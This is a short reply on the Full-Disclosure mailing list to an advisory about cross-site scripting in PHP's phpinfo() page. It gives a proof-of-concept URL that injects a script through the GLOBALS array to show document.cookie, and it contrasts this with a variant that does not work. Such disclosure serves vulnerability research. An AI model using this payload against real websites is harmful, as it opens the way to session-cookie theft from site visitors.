Re: [Full-disclosure] Advisory 18/2005: PHP Cross Site Scripting(XSS)XVulnerability in phpinfo()

[<phole () hushmail com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

great Work

PoC:
phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script>


this Don't Work:
phpinfo.php?test=<script>alert(document.cookie);</script>
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkNqJ2EACgkQ3APBCuix8ZmWRACgs0IvvixY6zfmkpJ/9APUtgPLFfgA
oJgOYQ4jbwGaTcJV95ZVyiAQwMXF
=zYsZ
-----END PGP SIGNATURE-----




Concerned about your privacy? Instantly send FREE secure email, no account
required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

--------------------------------------------------------

The information contained in this message is intended only for the
recipient, and may be a confidential attorney-client communication or may
otherwise be privileged and confidential and protected from disclosure. If
the reader of this message is not the intended recipient, or an employee
or agent responsible for delivering this message to the intended
recipient, please be aware that any dissemination or copying of this
communication is strictly prohibited. If you have received this
communication in error, please immediately notify us by replying to the
message and deleting it from your computer.

--------------------------------------------------------